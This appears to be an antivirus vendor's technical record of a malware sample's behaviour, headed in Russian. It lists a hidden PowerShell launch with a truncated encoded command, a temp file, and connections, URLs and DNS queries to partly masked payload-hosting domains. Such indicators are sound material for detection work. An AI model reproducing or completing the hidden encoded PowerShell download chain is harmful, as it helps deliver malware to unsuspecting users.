Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABOAHcAegB1AHoAYgBuAGoAPQAnAEQAegBzAHgAZwB6AGIAbQBsAGQAdAAnADsAJABPAHIAdQBrAG8AYgBwAGMAcgBhAHkAIAA9ACAAJwA4ADcAMgAnADsAJABBAHYAdQBwAHQAdwBlAHQAagB4AD0AJwBYAHk...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1229350.cvr
- 'ww###lper.com':80
- 'st###.aca-apac.com':443
- 'qu####ms.technology':80
- 'qu####ms.technology':443
- 'x.##2.us':80
- http://ww###lper.com/comm/moneymakers/css/m53/
- http://www.qu####ms.technology/wp-content/uploads/60d0crm2/
- http://x.##2.us/x.cer
- 'st###.aca-apac.com':443
- 'qu####ms.technology':443
- DNS ASK ds####neroots.com
- DNS ASK ok###atest.com
- DNS ASK ww###lper.com
- DNS ASK st###.aca-apac.com
- DNS ASK qu####ms.technology
- DNS ASK x.##2.us